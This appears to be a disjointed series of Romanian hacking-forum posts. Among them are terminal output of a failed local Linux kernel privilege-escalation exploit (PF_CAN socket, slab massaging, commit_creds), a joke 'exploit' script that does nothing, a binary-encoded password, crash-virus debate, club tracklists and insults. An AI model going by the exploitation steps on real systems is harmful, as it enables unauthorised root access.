Hit http://archive.ubuntu.com lucid-updates/multiverse Packages
Hit http://archive.ubuntu.com lucid-updates/multiverse Sources
Hit http://archive.ubuntu.com lucid-security/main Packages
Hit http://archive.ubuntu.com lucid-security/restricted Packages
Hit http://archive.ubuntu.com lucid-security/main Sources
Hit http://archive.ubuntu.com lucid-security/restricted Sources
Hit http://archive.ubuntu.com lucid-security/universe Packages
Hit http://archive.ubuntu.com lucid-security/universe Sources
Hit http://archive.ubuntu.com lucid-security/multiverse Packages
Hit http://archive.ubuntu.com lucid-security/multiverse Sources
Hit http://archive.ubuntu.com lucid-proposed/restricted Packages
Hit http://archive.ubuntu.com lucid-proposed/main Packages
Hit http://archive.ubuntu.com lucid-proposed/multiverse Packages
Hit http://archive.ubuntu.com lucid-proposed/universe Packages
Reading package lists... Done
root@eval-laptop:/home/eval# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@eval-laptop:/home/eval# uname -a
Linux eval-laptop 2.6.32-25-generic #43-Ubuntu SMP Wed Sep 1 09:46:39 UTC 2010 i686 GNU/Linux
root@eval-laptop:/home/eval# cat /etc/issue
Ubuntu 10.04.1 LTS \n \l
root@eval-laptop:/home/eval# exit
exit
eval@eval-laptop:~$
Am 2.6.32-25-generic. Am sa incerc iar exploit-ul si revin cu edit.
[Final edit -- hooray] WIN!
eval@eval-laptop:/tmp/exploit$ id
uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)
eval@eval-laptop:/tmp/exploit$ ./evil_expl0it
[+] looking for symbols...
[+] resolved symbol commit_creds to 0xc016dfe0
[+] resolved symbol prepare_kernel_cred to 0xc016e320
[+] setting up exploit payload...
[+] creating PF_CAN socket...
[+] connecting PF_CAN socket...
[+] clearing out any active OPs via RX_DELETE...
[+] removing any active user-owned shmids...
[+] massaging kmalloc-96 SLUB cache with dummy allocations
[+] corrupting BCM OP with truncated allocation via RX_SETUP...
[-] kernel rejected malformed CAN header
eval@eval-laptop:/tmp/exploit$ id
uid=1000(eval) gid=1000(eval) groups=4(adm),20(dialout),24(cdrom),46(plugdev),105(lpadmin),119(admin),122(sambashare),1000(eval)
eval@eval-laptop:/tmp/exploit$ #
-- fixed! -
Prietena ta? Deea?
sau Claudia?
Anyhow, "buna treaba".. Mhmmhmh. Eu practicam breakdance cand eram ciutan.
-
A trebuit ceva activat la Linux-ul respectiv, aditional? Patch-urile de la grsec erau? Cat despre SElinux (este si in Ubuntu? Stiu ca este in FC). Buna treaba.
Danke Nytro pentru aducere la cunostinta.
-
Trebuie sa RTFM! Iar, apoi: Amazon.com: Linux Bible 2010 Edition: Boot Up to Ubuntu, Fedora, KNOPPIX, Debian, openSUSE, and 13 Other Distributions (9780470485057): Christopher Negus: Books
Scuzati, nu m-am putut abtine.
-
Foarte interesant, multumesc, din preview am invatat deja cate ceva. Felicitari pentru articol!
Spor la mai multe!
-
adrianct raspunde la PM te rog, mersi!
apropo: tu ai facut tutorialul de pe YouTube postat de tine aici?
-
Oh nu! Este.... EA:
"Buna rau, chiar tare /melodia/, asta e una din armele tale?"
Cu asta nici nu incepi ca si termini... Bravo ei, se vede ca-i place dansul
. -
Trist... foarte trist, nu mai da atatea refresh-uri arzand de fericire cand dai cate un reply "inteligent" nebunule! Cocalar ratat ce esti
. -
I just had a jizz! o.O
Zirou dei, multam fain!
-
#!/usr/bin/python
# Acesta este un exploit care va intra oriunde
# Autor: Penetration Tester
# Nume: exploiter care penetreaza versiune 25 cm
# 0-day , cross-platform
import time
import sys
from socket import *
print '[+] Asteapta cateva secunde...'
time.sleep(2)
serverhost = '127.0.0.1'
buffer = ['45 78 70 6c 6f 69 74','42 6f 6f 6d']
if len (sys.argv) > 1:
serverhost = sys.argv[1]
print '[+] Exploitul sa trezit , mai asteapta putin...'
time.sleep(2)
sSock = socket(AF_INET, SOCK_STREAM)
try:
sSock.connect((serverhost,222))
except:
print '[+] Exploitul penetreaza serverul astept un raspuns...'
time.sleep(2)
for word in buffer:
try:
sSock.send(word)
data = sSock.recv(1024)
except:
print '[+] Serverul e jos, mam terminat ies acum... '
time.sleep(2)
sSock.close()
sys.exit()Foarte bun exploit-ul, mai e si 0-day, sau ma rog.. 1-day.
Babacu: ti-l recomand, trebuie sa-l folosesti dar mai intai trebuie sa ai Python instalat, dupa ce-l instalezi copiezi codul de mai sus si ii dai paste intr-un fisier numit "evil_exploit.py" trebuie sa aiba ".py" la sfarsit. Apoi intrii in Start > Run > cmd dai cd (change directory -- schimba directorul de lucru) unde l-ai facut, spre exemplu pe Desktop ("cd Desktop") si scrii "python evil_exploit.py" si acum ar trebuii sa ai serverul ala facut praf!
Succes si multa bafta, te mai asteptam cu cereri serioase de genul acesta.
-
chap0 face parte din Corelan? Nu stiam. Foarte bune articolele pe site-ul respectiv.
De asemenea: http://www.corelan.be:8800/index.php/2010/06/23/how-strong-is-your-fu-2-the-report/ [cred ca destul de necesar (dar optional) pentru a aplica egg-omletii xD]
Saru' mana!
-
Daca mai stiti melodii genul asteia lasati mesaj cu numele lor.
Sa aiba acelasi beat.
Michel Cleis - La Mezcla (Paul Kalkbrenner Remix)
Sper sa-ti placa.
-
Parola este: 01100010 01010111 01101100 01101010 01100011 01101101 00111001 01111010 01100100 01010111 01001110 01110010
Algoritmul folosit este: 01001110 01010100 01001100 01001101
creatoru': ai bagat-o pe #rainbowcrack?
-
Traducere:
Cand sa facut verificare sistemelor totul era verde si frumos intelegeti acuma?
E exact ca la o masinam , ramai fara ulei in motor si becul nu se aprinde iar tu continui sa mergi pana futi motorul.
Genii neintelese ce sunteti.
Alea sunt defectiunile tehnice ale avionului, dar de unde pana unde in "computerul central" care inregistra defectiunile tehnice, deci sa inteleg ca avea un fel de conexiune cu avionul si ii detecta, iar implicit avionul se baza pe serverul central? Nu prea cred! Si stii de ce? Din cate am vazut toata abureala asta cu virusii informatici a devenit un trend, ceva la moda prin presa, 'mega virus' distruge toata reteaua de iluminare a lumii, sau mai stiu eu ce... se cred in Matrix astia.
-
Iar, eu pot face asta:
Nu prea cred asa ceva, nicio defectiune a avionului la partea mecanica?
Computerul central al Spanair, care înregistra problemele tehnice ale avioanelor, nu a func?ionat corect, pentru c? fusese infectat cu un virus informatic, potrivit unui raport intern al companiei.Si asta a provocat flaps-urile sa nu se activeze? Harneala d-asta faceam cand aveam 8 anisori.
Avionul Boeing MD-82 avea trei probleme tehnice, o situa?ie care, în mod normal, nu i-ar fi permis s? decoleze.Ohhh, right, avionul avea trei probleme tehnice, dar un virus foarte inteligent si foarte foarte rau a blocat detectarea acestor probleme iar avionul a facut KPOOH, voi credeti asa ceva?
-
Interesant, mi-a tresarit mie o stare de dispozitie mai buna iesita din cele mentionate in thread-ul asta destul de lung (n-am mai scris atat de cand eram in clasa a VIII-a), am observat cateva chestii si anume unele lucruri (sa fac rau altora) imi displac si mi se taie cheful instant cand vine vorba de asa ceva de parca subconstientul m-ar bloca, dar cand vine vorba de challenges ma ambitionez foarte tare. Cred ca in fond tot ce conteaza este sa fii motivat, eu mereu am mers pe premiza 'cand ai chef fa, cand nu, fa ce ai chef', problema in care am cazut este 'dar atunci cand nu ai chef de nimic ce faci?' si pur si simplu nu ai chef de nimic; sa nu inveti fortat, doar atunci cand simti tu nevoia si te simti cel mai bine, dar se pare ca lucrurile au luat-o de sub control iar cheful de invatat si practicat nu mai vine ajungand intr-o stare deplorabila. Cat despre femei si asta... nici sa nu incep, nu este vorba de asa ceva. In fine, multumesc din nou pentru raspunsuri, trebuie sa fie o cale de iesire si 'reabilitare'. Iar pentru cei care sunt intr-o 'gaura' asemanatoare ii sfatuiesc urmatoarele: daca aveti prea multe idei in cap si ganduri faceti urmatoarele, luati o hartie si incepeti sa numerotati spre exemplu 1. Invat OpenSSH; 2. Invat Authentication Bypass, s.a.m.d. in importanta potrivita si cum credeti voi, va va ajuta, in rest la fel, cand aveti chef faceti cand nu nu, dar nici sa lungiti coarda prea mult ca ajungeti in situatia mea, sa va fie lene sa va si barbieriti sau sa va tundeti, si in restul starilor specificate (asta depinde de la persoana la persoana, logic).
-
Saru' mana xeqt! Intrebari: o stiai sau ai aflat-o dupa versuri sau/si alte metode?
DarkIceee: BA E POSIBIL! NA!!!!!!!!!!!!!!!!!!!!!!!! De o ora si tot caut, in sfarsit! Poftim dovada!
-
Poate te ajuta asta: http://kissfm.ro/blogs/partydul/2010/08/12/ed143-joi-alcatraz-vineri-cotton-sambata-megalos-tracklist-live/, inca ma chinui sa iti gasesc melodia dupa versuri, dar e dificil, stii cumva in ce limba, canta? Spaniola banuiesc..
Uite o lista cu melodiile cantate in editia respectiva, la care a fost si melodia ceruta de tine (numele ei):
# natalia zice... 15 August
Cam asta a fost din punctul meu de vedere:
Warm up Dj Minu:
01 Lady Gaga – Alejandro (Dave Aude Club Mix)
02?
03 Xonia – My beautiful one (Extended)
04 Alessia – Boro Na Sou Po (Emil Lassaria Remix)
05 Dj Robert Georgescu ft Lara – Beside You (Original Extended)
06 Backstreet Boys – Everybody (Remix)
07 Axe Bahia – Thu thuca (Javi Torres Remix)
08 Reel 2 Real ft. The Stuntman – I Like to Move It (REMIX)
09 Nick Kamarera Feat. Mike Diamondz – Thailanda (Extended Version)
10 DJ Andi feat. Stella – Happiness (Official Extended Version)
11 Djuma Soundsystem – Les Djinns (Remix)
12 Miranda – Vamos A La Playa (Remix)
13 Doi Deejay – Caminaba (Original Mix)
14 Elena Gheorghe – Disco Romancing (Extended Version)
15 Inna – Sun Is Up (Extended Version)
16 Morris – Angel eyes (Treitl Hammond Remix)
17 Neylini – Share my love (Deepside Deejays Original Extended)
18 Steve Forest vs. Marilyn Monroe – I Wanna Be Loved By You (Hard Rock Sofa Mix)
19?
20 DJ Dark & Sonny Flame – Jump UP (Claudio Cristo Remix
21 Shakira – Waka Waka (Time For Africa) (Extended Version)
22 Criminal Vibes – Excuse Me Mr. DJ (Original Criminal Mix)
23 Funky Junction vs Splashfunk – Shake That Booty (Funky Junction & Felipe C Remix)
24 Stromae – Alors On Danse (Alvaro Bootleg)
25 Radio Killer – Be Free (Official Club Version)
26?
OLiX in the mix:
01 Phil Fuldner – Miami Pop 2010 (Mario da Ragnio Remix)
02. Vanilla Ice – Ice Ice Baby (Remix)
03 Boney M – Daddy cool 2010 (Dirty Bass Project Club Mix)
04 Alexandra Stan – Lollipop (param pam pam)
05 Gloria Estefan – Conga (John Revox 2010 Radio Mix)
06 Kanza – Do IT (Adrian LouD HeyHey Remix)
07 Riva Starr Feat. Vlada Tomova – Bulgarian Chicks (Remix)
08 Juan Magan – Mariah (Original Extended Mix)
09?
10?
11 Kobi Peretz – Some Love (Kama Ahava Remix)
12 Narcotic Sound & Christian D – Mamasita (Reworked Club Mix)
13 Mossano – Zingarinho (Original Extended Mix)
14 Alexandra Ungureanu ft. Crush – Party On (SugarDaddys Brownie Extended Mix)
15 Cartoons vs Ternipe – Mega Fitza (Club Extended)
16 Jay Ko – High Note (Extended Version)
17 Tom Boxer feat. Antonia – Shake It Mamma (Reworked Extended)
18 Enur feat. Natasja – Calabria (Dj KilleR & Mr Yahtzee 2010 Mix)
19 David Guetta feat Kid Cudi – Memories (David Guettas Fuck Me Im Famous Remix)
DJ JONNESSEY in the mix:
20 AlexUnder Base Feat. Lys – Drums (Dony & The Kid Club Mix)
21 London32 vs Qpido Level – La Ghalo (Vali Barbulescu Remix)
22 Yolanda Be Cool feat. Dcup – We No Speak Americano
23 Morris – Angel eyes (Remix)
24 DJ Project feat. Giulia – Regrete (Extended Version)
25 Dream City – One Love (Extended Version)
26 Funky Junction vs Splashfunk – Shake That Booty (Funky Junction & Felipe C Remix)
27 Andreea Banica – Love in Brasil (Extended Version)
28 Dj Dark feat. Sonny Flame – Jump UP (Official Club Extended)
29 Elena Gheorghe – Disco Romancing (Extended Version)
30 Chris Mayer & Connect-R – Still (Extd version)
31 Intensa Music Ft. 50 Cent – Get Right In Da Club (Quino Garcia VS Alvaro Guerra & Kilian Dominguez)
32 Alessia – Boro Na Sou Po (Emil Lassaria Remix)
OLiX in the mix:
33 Tiesto Ft Nelly Furtado – Who Wants To Be Alone (David Tort Remix)
34 Speak One – Saxo Club (Partydul Kiss FM ID)
35 Jimmy Dub – Monday (Chris Mayer Official Extended)
36 Dennis Ferrer – Hey Hey (Funk D Casey Copa Bootleg)
37 Pedro Cazanova Invites Andrea – Selfish Love (Gregor Salto Remix)
38 Alex Velea – Don’t say it’s over (Konstantin Club Mix)
39 Stromae – Alors On Danse (Alvaro Bootleg)
40 Voltaj – Mi-e Dor De (Dj Yaang Extended Remix)
41 Reel 2 Real ft. The Stuntman – I Like to Move It (Sidney Samson Remix)
42 Dj Sava & Raluka – I Like (The Trumpet) (Extended Version)
43 David DeeJay feat Dony – Temptation
44 Stefan Banica Sr & Stefan Banica Jr – Cum Am Ajuns Sa Te Iubesc (Hi-Q Remix)
45 DJ Nick & Mc Giany (NyG) ft. Miss Mewy – Summer Rain (Extended Version
46 Ron carroll – Walking down the street (Bart B More j
47 Alb Negru – Charisma (Chris Mayer R.O.P. remix)
48 Dj Robert Georgescu ft Lara – Beside You (Extended Version)
49 Morris – Angel Eyes (Treitl Hammond Remix)
50 Bentu de Soli – Pearls of summer (SugarDaddys Solid Extended Mix)
51 Dj Bigice & Outffit – Vejo Bonito (Nick Kamarera Extended)
52 Hi-Q feat Kamelia – The One (extended)
53 Ricky L Feat. Mck – Born Again (Balearic Soul Party Mix)
54 Armand van Helden – The Funk Phenomena
55 Dj Rynno & Sylvia – Stereo (Club Version)
56 Ryan & Radu – Rush Love (Spanish Version) (Extended Version)
57 Tom Boxer feat. Antonia – Morena (Kiss FM ID)
58 Travis Mccoy feat Bruno Mars – Billionaire
59 Intensa Music Vs Baha Man – Dogs Out (Alvaro Guerra & Kilian Dominguez Vs Javi Slink)
60 Qpido Level – The Pitzi Song (Extended Version) (prod. by London32)
61 Andra – Abelia (DJ Yaang Remix)
62 Starchild vs. Sunrise Inc – Lick shot (Original Extended Version)
63 DJ Andi feat. Stella – Happiness (Official Extended Version)
64 Deepcentral – Music Makes Me Free (Extended Version)
65 Lady Gaga – Alejandro (Dave Aude Club Mix)
66 Wamdue Project Feat. Jonathan – King Of My Castle 2009 (dex Diamond Vocal Mix)
Poti observa niste semne de intrebare... cred ca pe acolo era aceasta. Le-am luat aproape pe toate la rand pe YouTube, niciuna nu e.
Daca deschizi acest topic esti ratat
in Off-topic
Posted
Eh... si supraestimarea asta, rareori e buna.
P.S.: @ Nytro: frumoasa miscare de a iti face o statistica
Reverse Social Engineering FTW!
## One good point:
Corect, scuze.